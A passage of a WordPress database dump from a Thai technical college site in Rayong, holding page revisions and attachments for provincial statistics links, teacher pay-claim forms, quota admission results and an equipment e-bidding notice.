height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/images/stories/rayongdata60.pdf\">บรรยายสรุปจังหวัดระยอง 2560</a></h4>\r\n</div>\r\n<h4><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h4>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n \r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></h4>\r\n<h4><span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span></h4>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></h4>\r\n<h4><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></h4>\r\n</div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-02-07 09:26:16', '2018-02-07 02:26:16', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(1047, 3, '2018-02-07 10:12:18', '2018-02-07 03:12:18', '<img class=\"aligncenter wp-image-978 size-medium\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-21-55-274x300.jpg\" alt=\"\" width=\"274\" height=\"300\" />\r\n\r\n<img class=\"aligncenter wp-image-985 size-medium\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-50-51-1-300x73.jpg\" alt=\"\" width=\"300\" height=\"73\" />\r\n\r\n<img class=\"aligncenter wp-image-979 size-medium\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-32-17-271x300.jpg\" alt=\"\" width=\"271\" height=\"300\" />\r\n\r\n<img class=\"aligncenter wp-image-988 size-medium\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-09-15-300x73.jpg\" alt=\"\" width=\"300\" height=\"73\" />\r\n\r\n<img class=\"aligncenter wp-image-980 size-medium\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-33-14-270x300.jpg\" alt=\"\" width=\"270\" height=\"300\" />\r\n\r\n<img class=\"aligncenter wp-image-989\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-12-19.jpg\" alt=\"\" width=\"400\" height=\"88\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-990\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-15-12.jpg\" alt=\"\" width=\"400\" height=\"88\" />\r\n\r\n<img class=\"aligncenter wp-image-981 size-medium\" src=\"/wp-content/uploads/2018/02/6-2-2561-10-34-02-272x300.jpg\" alt=\"\" width=\"272\" height=\"300\" />\r\n\r\n<img class=\"aligncenter wp-image-991\" src=\"/wp-content/uploads/2018/02/6-2-2561-11-17-16.jpg\" alt=\"\" width=\"400\" height=\"81\" />\r\n\r\n ', 'คณะผู้บริหารวิทยาลัยฯ', '', 'inherit', 'closed', 'closed', '', '982-revision-v1', '', '', '2018-02-07 10:12:18', '2018-02-07 03:12:18', '', 982, 'http://www.technicrayong.ac.th/982-revision-v1/', 0, 'revision', '', 0),
(1048, 4, '2018-02-07 17:45:31', '2018-02-07 10:45:31', ' \r\n\r\n<a href=\"https://drive.google.com/file/d/1DZkrHNQxk8JmNj5OtMFK2Jej3T_agt9K/view?usp=sharing\">ใบเบิกเงินค่าสอนเกินภาระงานการสอน </a>', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-07 17:45:31', '2018-02-07 10:45:31', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1049, 4, '2018-02-07 18:22:38', '2018-02-07 11:22:38', ' \r\n\r\n<a href=\"https://drive.google.com/file/d/1mj4XNUdsOdmOJGBpSNBoImD9hBCmjc7x/view?usp=sharing\">ใบเบิกเงินค่าสอนเกินภาระงานการสอน </a>', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-07 18:22:38', '2018-02-07 11:22:38', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1050, 4, '2018-02-07 18:34:56', '2018-02-07 11:34:56', ' \r\n\r\n<a href=\"https://drive.google.com/file/d/1Hur1l_b8cBcj9sqlQ9ZPa5tYVBNJ2WUk/view?usp=sharing\">ใบเบิกเงินค่าสอนเกินภาระงานการสอน </a>', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-07 18:34:56', '2018-02-07 11:34:56', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1052, 4, '2018-02-10 08:26:29', '2018-02-10 01:26:29', '<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/11wsqrbvPT25iO4w5nF9vciT98jsWejZ1/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวช.ล้วน</a>\r\n\r\n<hr />\r\n\r\n \r\n\r\n<a href=\"https://drive.google.com/file/d/13DeyicD3Kkg2n5kHsQYu9jrbo5yf0Rz2/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวส.ล้วน</a>\r\n\r\n<hr />\r\n\r\n ', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-10 08:26:29', '2018-02-10 01:26:29', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
(1053, 1, '2018-02-11 14:30:10', '2018-02-11 07:30:10', '', 'manual-rms-for-teacher-2-2560', '', 'inherit', 'closed', 'closed', '', 'manual-rms-for-teacher-2-2560', '', '', '2018-02-11 14:30:10', '2018-02-11 07:30:10', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/manual-rms-for-teacher-2-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(1054, 1, '2018-02-11 14:30:14', '2018-02-11 07:30:14', '', 'Watch-guard-chedule-02-2561', '', 'inherit', 'closed', 'closed', '', 'watch-guard-chedule-02-2561', '', '', '2018-02-11 14:30:14', '2018-02-11 07:30:14', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/Watch-guard-chedule-02-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(1055, 1, '2018-02-11 14:30:15', '2018-02-11 07:30:15', '', 'student equipmen-e-bidding-2561-01', '', 'inherit', 'closed', 'closed', '', 'student-equipmen-e-bidding-2561-01', '', '', '2018-02-11 14:30:15', '2018-02-11 07:30:15', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/student-equipmen-e-bidding-2561-01.pdf', 0, 'attachment', 'application/pdf', 0),
(1056, 1, '2018-02-11 14:30:24', '2018-02-11 07:30:24', '', 'student equipmen-e-bidding-2561-02', '', 'inherit', 'closed', 'closed', '', 'student-equipmen-e-bidding-2561-02', '', '', '2018-02-11 14:30:24', '2018-02-11 07:30:24', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/student-equipmen-e-bidding-2561-02.pdf', 0, 'attachment', 'application/pdf', 0),
(1057, 1, '2018-02-11 14:30:37', '2018-02-11 07:30:37', '', 'quota-admission-2561-pvc', '', 'inherit', 'closed', 'closed', '', 'quota-admission-2561-pvc', '', '', '2018-02-11 14:30:37', '2018-02-11 07:30:37', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/quota-admission-2561-pvc.pdf', 0, 'attachment', 'application/pdf', 0),
(1058, 1, '2018-02-11 14:30:42', '2018-02-11 07:30:42', '', 'quota-admission-2561-pvs', '', 'inherit', 'closed', 'closed', '', 'quota-admission-2561-pvs', '', '', '2018-02-11 14:30:42', '2018-02-11 07:30:42', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/quota-admission-2561-pvs.pdf', 0, 'attachment', 'application/pdf', 0),
(1059, 1, '2018-02-11 14:30:45', '2018-02-11 07:30:45', '', 'Watch-guard-chedule-01-2561', '', 'inherit', 'closed', 'closed', '', 'watch-guard-chedule-01-2561', '', '', '2018-02-11 14:30:45', '2018-02-11 07:30:45', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/Watch-guard-chedule-01-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(1061, 1, '2018-02-11 14:42:45', '2018-02-11 07:42:45', '', 'e-bidding-4-item-2561', '', 'inherit', 'closed', 'closed', '', 'e-bidding-4-item-2561', '', '', '2018-02-11 14:42:45', '2018-02-11 07:42:45', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/e-bidding-4-item-2561.jpg', 0, 'attachment', 'image/jpeg', 0),
(1064, 1, '2018-02-11 14:50:00', '2018-02-11 07:50:00', '<h4><a href=\"/wp-content/uploads/2018/01/quota-admission-2561-pvs.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"/wp-content/uploads/2018/01/quota-admission-2561-pvc.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<strong><span style=\"color: #0000ff;\">มีปัญหาในการสมัครออนไลน์ โทร 094-5166653\r\n</span></strong>\r\n\r\n<strong><span style=\"color: #0000ff;\">นักเรียน/นักศึกษาโควตา\r\nปีการศึกษา 2561.\r\nให้กรอกข้อมูลผ่านระบบออนไลน์. และพิมพ์ใบสมัครมาใช้ประกอบการมอบตัวตามวันเวลาที่กำหนด.\r\n</span></strong>\r\n\r\n \r\n\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://www.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', ' ', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-02-11 14:50:00', '2018-02-11 07:50:00', '', 287, 'http://www.technicrayong.ac.th/287-revision-v1/', 0, 'revision', '', 0),
(1065, 1, '2018-02-11 14:57:04', '2018-02-11 07:57:04', '', 'register-online-2561-01', '', 'inherit', 'closed', 'closed', '', 'register-online-2561-01', '', '', '2018-02-11 14:57:04', '2018-02-11 07:57:04', '', 287, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/register-online-2561-01.jpg', 0, 'attachment', 'image/jpeg', 0),
(1066, 1, '2018-02-11 14:57:09', '2018-02-11 07:57:09', '', 'register-online-2561-02', '', 'inherit', 'closed', 'closed', '', 'register-online-2561-02', '', '', '2018-02-11 14:57:09', '2018-02-11 07:57:09', '', 287, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/register-online-2561-02.jpg', 0, 'attachment', 'image/jpeg', 0),
(1067, 1, '2018-02-11 14:57:11', '2018-02-11 07:57:11', '', 'register-online-2561-03', '', 'inherit', 'closed', 'closed', '', 'register-online-2561-03', '', '', '2018-02-11 14:57:11', '2018-02-11 07:57:11', '', 287, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/01/register-online-2561-03.jpg', 0, 'attachment', 'image/jpeg', 0),
(1068, 1, '2018-02-11 14:59:16', '2018-02-11 07:59:16', '<h4><a href=\"/wp-content/uploads/2018/01/quota-admission-2561-pvs.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"/wp-content/uploads/2018/01/quota-admission-2561-pvc.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<strong><span style=\"color: #0000ff;\">มีปัญหาในการสมัครออนไลน์ โทร 094-5166653\r\n</span></strong>\r\n\r\n<strong><span style=\"color: #0000ff;\">นักเรียน/นักศึกษาโควตา\r\nปีการศึกษา 2561.\r\nให้กรอกข้อมูลผ่านระบบออนไลน์. และพิมพ์ใบสมัครมาใช้ประกอบการมอบตัวตามวันเวลาที่กำหนด.\r\n</span></strong>\r\n\r\n \r\n\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"/wp-content/uploads/2018/01/register-online-2561-01.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"/wp-content/uploads/2018/01/register-online-2561-02.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"/wp-content/uploads/2018/01/register-online-2561-03.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561', ' ', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-02-11 14:59:16', '2018-02-11 07:59:16', '', 287, 'http://www.technicrayong.ac.th/287-revision-v1/', 0, 'revision', '', 0),
(1069, 1, '2018-02-11 15:01:28', '2018-02-11 08:01:28', '<a href=\"/wp-content/uploads/2018/01/student-equipmen-e-bidding-2561-01.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n \r\n\r\n<img class=\"alignnone size-thumbnail wp-image-578\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.tif\" alt=\"\" width=\"1\" height=\"1\" /> <img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"aligncenter wp-image-581 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-580 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', ' ', 'inherit', 'closed', 'closed', '', '579-revision-v1', '', '', '2018-02-11 15:01:28', '2018-02-11 08:01:28', '', 579, 'http://www.technicrayong.ac.th/579-revision-v1/', 0, 'revision', '', 0),
(1070, 1, '2018-02-11 15:12:19', '2018-02-11 08:12:19', '<a href=\"/wp-content/uploads/2018/01/manual-rms-for-teacher-2-2560.pdf\">คลิ๊กเพื่อเปิดดู</a>', 'Power Point อบรม RMS สำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '788-revision-v1', '', '', '2018-02-11 15:12:19', '2018-02-11 08:12:19', '', 788, 'http://www.technicrayong.ac.th/788-revision-v1/', 0, 'revision', '', 0),
(1071, 1, '2018-02-11 15:13:45', '2018-02-11 08:13:45', '[pdfjs-viewer url=\"/wp-content/uploads/2018/01/Watch-guard-chedule-02-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ตารางเวร เดือนกุมภาพันธ์ 2561', '', 'inherit', 'closed', 'closed', '', '794-revision-v1', '', '', '2018-02-11 15:13:45', '2018-02-11 08:13:45', '', 794, 'http://www.technicrayong.ac.th/794-revision-v1/', 0, 'revision', '', 0),
(1072, 1, '2018-02-11 15:20:32', '2018-02-11 08:20:32', '<a href=\"/wp-content/uploads/2018/01/student-equipmen-e-bidding-2561-02.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n \r\n\r\n<img class=\"alignnone size-thumbnail wp-image-578\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.tif\" alt=\"\" width=\"1\" height=\"1\" /> <img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"aligncenter wp-image-581 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-580 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', ' ', 'inherit', 'closed', 'closed', '', '579-revision-v1', '', '', '2018-02-11 15:20:32', '2018-02-11 08:20:32', '', 579, 'http://www.technicrayong.ac.th/579-revision-v1/', 0, 'revision', '', 0),
(1073, 1, '2018-02-11 15:35:08', '2018-02-11 08:35:08', '', 'tender-e-bidding1', '', 'inherit', 'closed', 'closed', '', 'tender-e-bidding1', '', '', '2018-02-11 15:37:38', '2018-02-11 08:37:38', '', 579, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/tender-e-bidding1.jpg', 0, 'attachment', 'image/jpeg', 0),
(1074, 1, '2018-02-11 15:35:15', '2018-02-11 08:35:15', '', 'tender-e-bidding2', '', 'inherit', 'closed', 'closed', '', 'tender-e-bidding2', '', '', '2018-02-11 15:37:58', '2018-02-11 08:37:58', '', 579, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/02/tender-e-bidding2.jpg', 0, 'attachment', 'image/jpeg', 0),
(1075, 1, '2018-02-11 15:42:44', '2018-02-11 08:42:44', '<a href=\"/wp-content/uploads/2018/01/student-equipmen-e-bidding-2561-02.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\n\n<a href=\"/wp-content/uploads/2018/02/tender-e-bidding1.jpg\"><img class=\"aligncenter wp-image-1073 size-large\" src=\"/wp-content/uploads/2018/02/tender-e-bidding1-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /></a>\n\n<a href=\"/wp-content/uploads/2018/02/tender-e-bidding2.jpg\"><img class=\"aligncenter size-large wp-image-1074\" src=\"/wp-content/uploads/2018/02/tender-e-bidding2-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /></a>', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', ' ', 'inherit', 'closed', 'closed', '', '579-autosave-v1', '', '', '2018-02-11 15:42:44', '2018-02-11 08:42:44', '', 579, 'http://www.technicrayong.ac.th/579-autosave-v1/', 0, 'revision', '', 0),
(1076, 1, '2018-02-11 15:38:05', '2018-02-11 08:38:05', '<a href=\"/wp-content/uploads/2018/01/student-equipmen-e-bidding-2561-02.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n \r\n\r\n<a href=\"/wp-content/uploads/2018/02/tender-e-bidding1.jpg\"><img src=\"/wp-content/uploads/2018/02/tender-e-bidding1-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" class=\"aligncenter size-large wp-image-1073\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/02/tender-e-bidding2.jpg\"><img src=\"/wp-content/uploads/2018/02/tender-e-bidding2-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" class=\"aligncenter size-large wp-image-1074\" /></a>\r\n\r\n<img class=\"alignnone size-thumbnail wp-image-578\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.tif\" alt=\"\" width=\"1\" height=\"1\" /> <img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.tif\" alt=\"\" width=\"1\" height=\"1\" /><img class=\"aligncenter wp-image-581 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding1.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />\r\n\r\n \r\n\r\n<img class=\"aligncenter wp-image-580 size-full\" src=\"/wp-content/uploads/2018/01/ประกวดราคา-e-bidding2.jpg\" alt=\"\" width=\"1656\" height=\"2339\" />', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', ' ', 'inherit', 'closed', 'closed', '', '579-revision-v1', '', '', '2018-02-11 15:38:05', '2018-02-11 08:38:05', '', 579, 'http://www.technicrayong.ac.th/579-revision-v1/', 0, 'revision', '', 0),
(1077, 1, '2018-02-11 15:39:49', '2018-02-11 08:39:49', '<a href=\"/wp-content/uploads/2018/01/student-equipmen-e-bidding-2561-02.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n \r\n\r\n<img class=\"alignnone size-thumbnail wp-image-578\" src=/wp-content/uploads/2018/02/tender-e-bidding1.jpg\" alt=\"\" width=\"1\" height=\"1\" /> \r\n\r\n<img class=\"alignnone size-thumbnail wp-image-577\" src=\"/wp-content/uploads/2018/02/tender-e-bidding2.jpg\" alt=\"\" width=\"1\" height=\"1\" />\r\n', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', ' ', 'inherit', 'closed', 'closed', '', '579-revision-v1', '', '', '2018-02-11 15:39:49', '2018-02-11 08:39:49', '', 579, 'http://www.technicrayong.ac.th/579-revision-v1/', 0, 'revision', '', 0),
(1078, 1, '2018-02-11 15:41:32', '2018-02-11 08:41:32', '<a href=\"/wp-content/uploads/2018/01/student-equipmen-e-bidding-2561-02.pdf\">เอกสารประกวดราคาซื้อด้วยวิธีประกวดราคาอิเล็กทรอนิกส์ (e-bidding)2561</a>\r\n\r\n<a href=\"/wp-content/uploads/2018/02/tender-e-bidding1.jpg\"><img class=\"aligncenter size-large wp-image-1073\" src=\"/wp-content/uploads/2018/02/tender-e-bidding1-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/02/tender-e-bidding2.jpg\"><img class=\"aligncenter size-large wp-image-1074\" src=\"/wp-content/uploads/2018/02/tender-e-bidding2-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /></a>', 'ประกาศประกวดราคาซื้อเครื่องมือประจำตัวผู้เรียนเฉพาะอาชีพ ของนักเรียนสายอาชีพ ระดับ ปวช.1 ด้วยวิธีประกวดราคาอิเล็กทรอนิกส์', ' ', 'inherit', 'closed', 'closed', '', '579-revision-v1', '', '', '2018-02-11 15:41:32', '2018-02-11 08:41:32', '', 579, 'http://www.technicrayong.ac.th/579-revision-v1/', 0, 'revision', '', 0),
(1079, 4, '2018-02-13 19:05:55', '2018-02-13 12:05:55', '<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/11wsqrbvPT25iO4w5nF9vciT98jsWejZ1/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวช.ล้วน</a>\r\n\r\n<hr />\r\n\r\n \r\n\r\n<a href=\"https://drive.google.com/file/d/13DeyicD3Kkg2n5kHsQYu9jrbo5yf0Rz2/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน ปวส.ล้วน </a>\r\n\r\n<hr />\r\n\r\n<a href=\"https://drive.google.com/file/d/18glBwDAdpRtBe3E-cVBJz6Qst21ZDPZ-/view?usp=sharing\">ตัวอย่างใบเบิกค่าสอนเกินภาระงานสำหรับ ครูสอน 2ระดับ NEW</a>', 'เอกสารสำหรับครูผู้สอน', '', 'inherit', 'closed', 'closed', '', '1033-revision-v1', '', '', '2018-02-13 19:05:55', '2018-02-13 12:05:55', '', 1033, 'http://www.technicrayong.ac.th/1033-revision-v1/', 0, 'revision', '', 0),
